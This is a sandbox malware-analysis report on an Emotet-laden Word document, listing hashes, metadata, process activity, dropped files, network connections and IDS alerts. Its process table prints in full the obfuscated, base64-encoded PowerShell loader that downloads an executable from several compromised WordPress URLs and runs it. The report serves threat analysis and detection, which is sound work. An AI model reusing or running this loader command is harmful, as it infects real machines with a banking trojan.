Malware analysis DOCUMENTO-2019-HR_4905316.doc Malicious activity

Add for printing

File name:	DOCUMENTO-2019-HR_4905316.doc
Full analysis:	https://app.any.run/tasks/70501a1d-134b-4cce-8541-9b2ff5dab631
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	October 09, 2019, 14:48:10
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open emotet-doc emotet generated-doc
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: methodical, Subject: directional, Author: Rossie Ullrich, Keywords: online, Comments: Small Steel Fish, Template: Normal.dotm, Last Saved By: Niko Schultz, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0
MD5:	B2941BA1901F23EB3BE707EF22173217
SHA1:	8297267C862E8EE535FFD2C5B7D5A3DBBD42C51C
SHA256:	1E3239B3B1A51E5876877727082123611637AA6CB1BB91D3E4928D8BAD122FC2
SSDEEP:	6144:7sJdGk8SrLkI07NSU4jJnUATfD9NcFQrQ7/4pm:7sJdGk8kX07NSU4VVP9NcFXQpm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 180 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 120 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Executed via WMI
  - powershell.exe (PID: 2740)
- Creates files in the user directory
  - powershell.exe (PID: 2740)
- PowerShell script executed
  - powershell.exe (PID: 2740)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2796)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2796)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType:	Microsoft Word 97-2003 Document
CompObjUserTypeLen:	32
Manager:	Mitchell
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	202
Paragraphs:	1
Lines:	1
Company:	Bahringer Inc
CodePage:	Windows Latin 1 (Western European)
Security:	None
Characters:	173
Words:	30
Pages:	1
ModifyDate:	2019:10:09 13:30:00
CreateDate:	2019:10:09 13:30:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	Niko Schultz
Template:	Normal.dotm
Comments:	Small Steel Fish
Keywords:	online
Author:	Rossie Ullrich
Subject:	directional
Title:	methodical

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2796	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCUMENTO-2019-HR_4905316.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2740	powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGMAOQAwADAAMAAwADcAYgAwADYAPQAnAHgAMAB4ADgAMgA4AGIAMgAwAHgAMAAnADsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAIAA9ACAAJwA5ADkANgAnADsAJAB4ADIAOAAzADQAMAAzADQAMQA4ADEAPQAnAGIANQA0ADUANAAzAGIAOQB4ADAANAAnADsAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAYgAwADAANAA5ADAAMwA1ADYAPQAnAGMAMAAwADMANQA1ADYANwAwADMANgAnADsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABJAEUAbgB0ADsAJAB4ADUANgAzADUAMABjADAAMAA0ADAAMAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAcgBpAGQAYQBsAG0AZQBoAG4AZABpAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGwAbAB2AHEAYQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbwBzAGgAdQBuAHYAaQByAGcAaQBuAGgAYQBpAHIAYwBvAC4AYwBvAG0ALwBjAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5AC8AeQBuADgAZgBqADAAMAA0ADEAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AGkAcwBhAHQAbABhAGcAcgBhAG4AagBhAC4AYwBvAG0ALwA3AGIAaQBlAGMAMwAvAHUAbQA5AGoAMwA2ADAANgAvAEAAaAB0AHQAcAA6AC8ALwAzAGQAcwBoAGEAcgBwAGUAZABnAGUALgBjAG8AbQAvAGQAYgBjAG8AbgBuAGUAYwB0AC8AeAAzADgANgA5ADEANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAaABlAGMAcgBlAGUAawBwAHYALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAHkAbwB1AGQALwBpAGoAMQAvACcALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABiADMAYwAyADEANAB4AHgANgA1AGIAMAA9ACcAYgA4AGMAMAAwADEAMQAzADAAMQA4ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHgANAAwADAANwA2ADQAMwAzADAAMwAgAGkAbgAgACQAeAA1ADYAMwA1ADAAYwAwADAANAAwADAAKQB7AHQAcgB5AHsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AC4AIgBkAGAATwBXAG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJAB4ADQAMAAwADcANgA0ADMAMwAwADMALAAgACQAeAAyADkANgAzADAANgBiADMANAAxADkAMAApADsAJAB4AHgANwA2ADQAMwB4ADMAOAB4ADIAYgBjAD0AJwB4ADgANgAxAHgAYgAwADgANAA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwACkALgAiAEwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADkAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgB0ACIAKAAkAHgAMgA5ADYAMwAwADYAYgAzADQAMQA5ADAAKQA7ACQAYwA4ADIAMAAxADAANgAwADYANQAwADMAPQAnAHgAOAAwAGIAYgAxADcANwBiADkANAA5ADMAJwA7AGIAcgBlAGEAawA7ACQAYwBiADAAeAAwADkANAB4AGIAMAAzAD0AJwB4AGIAMwA5AHgAMAA2ADAAMABjADMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADYANwA2ADUAYwA5ADcAMwAwADIAPQAnAGMAOAA5AGMAOQA2AGMANQB4ADQAOAAnAA==	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 361

Read events

882

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2796	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR36E5.tmp.cvr		—
		MD5:—	SHA256:—
2740	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3LU63SH0GYKGOK0I26UZ.temp		—
		MD5:—	SHA256:—
2796	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:1412667EC4865D044A7379F1850BD434	SHA256:4360C33228182DCEE8E50380CCFC0671590C9F0CF07309D348293C231F1678E6
2796	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCF24ED6.wmf		wmf
		MD5:3D89CEAD755252D611181C1BD910BD32	SHA256:B0628F4D8DBFF3169EC2D0E5DD6A676A94AA22045BB9CF539F3716CE405C923E
2796	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A228E82.wmf		wmf
		MD5:B4B71D08FEF9609A374B607B16131F66	SHA256:551016BF128C59AC225ECCA3F91EE39396858331B65634D8535CD7AF488780A9
2796	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9345954.wmf		wmf
		MD5:97D190F7A3C9B557A0004C3740CC0743	SHA256:ED0FA66BF5C6F60F19619D29D0300F2537D0F65462C2A855B797FAF335280351
2796	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E409788.wmf		wmf
		MD5:AB0BB61C56F3271BD2ACE3AECD8A076E	SHA256:DDBE05BFEF8D21C8DACB85DC358689228D62082094E73063F369A353100FDF9E
2740	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:A670ADD3BF0A1901BD12CC7C4CD70086	SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986
2740	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf5422.TMP		binary
		MD5:A670ADD3BF0A1901BD12CC7C4CD70086	SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986
2796	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43EB02E3.wmf		wmf
		MD5:381C52C5F21C8DFB7E16E6767CBA1318	SHA256:E7756DB3FE7055794DEC7777A6765A67A50D187EFE0762492AEE2E1573B6EA4A

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2740	powershell.exe	GET	—	103.129.99.179:80	http://www.bridalmehndistudio.com/wp-admin/ellvqa6/	unknown	—	—	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2740	powershell.exe	103.129.99.179:80	www.bridalmehndistudio.com	—	—	suspicious

DNS requests

Domain	IP	Reputation
www.bridalmehndistudio.com	103.129.99.179	suspicious

Threats

PID	Process	Class	Message
2740	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2740	powershell.exe	A Network Trojan was detected	AV INFO Suspicious EXE download from WordPress folder
2740	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2740	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP

Add for printing

No debug info

General Info

DOCUMENTO-2019-HR_4905316.doc

B2941BA1901F23EB3BE707EF22173217

8297267C862E8EE535FFD2C5B7D5A3DBBD42C51C

1E3239B3B1A51E5876877727082123611637AA6CB1BB91D3E4928D8BAD122FC2

6144:7sJdGk8SrLkI07NSU4jJnUATfD9NcFQrQ7/4pm:7sJdGk8kX07NSU4VVP9NcFXQpm

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Executed via WMI

Creates files in the user directory

PowerShell script executed

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings